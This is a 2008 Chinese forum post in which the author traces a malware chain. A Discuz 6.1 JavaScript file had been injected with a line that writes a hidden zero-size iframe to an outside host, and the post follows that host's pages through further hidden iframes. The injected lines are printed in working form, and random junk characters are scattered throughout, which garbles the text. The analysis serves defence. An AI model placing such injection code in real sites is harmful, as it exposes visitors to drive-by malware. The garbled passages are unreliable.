梦影 2008-5-30 22:05
记一次简单的抓马过程
今天中午,有人向我求助,DZ6.1中的文件/include/javascript/common.js最后被人插入了了如下一行代码.
2q{-s
se'faj
[code]
^V`vO
document.writeln("<iframe src=http://jj.jmslj.com/zz.html style='width: 0px; height: 0px;'></iframe>")
2A6}Bo4w\N5r
[/code]x
D8XJXCak*f
清除掉后第二天又中,不知问题在哪,报给了官方,偶还是找马吧...jS|t9H i~
先下载http://jj.jmslj.com/zz.html,内容如下:
4j,fh r
I
a
[code]N"C.Gj4h!l
sF(_ cl
<iframe src='http://jj.jmslj.com/a11.htm' style="width: 0px; height: 0px;"></iframe>3O
cm
{t.Yqj
<script language="javascript" src="http://count38.51yes.com/click.aspx?id=386950387&logo=1"></script>,o#B~!r:lj;~FA;f
[/code]
!b f8J6PO#M
先看下这个页面:http://jj.jmslj.com/a11.htm,内容如下:
uFj6uT6g:q{Z
[code]m? r?T_#mt
<body>errW1U*WXvs.s5em4?I
<script language="javascript">+E~-RXtfnE
9GI3Uw| K
document.writeln("<iframe src=\"a1111.htm\"><\/iframe><iframe src=\"a6111.htm\"><\/iframe><iframe src=\"jsr222.htm\"><\/iframe>");
8z
`6yR&}$y8d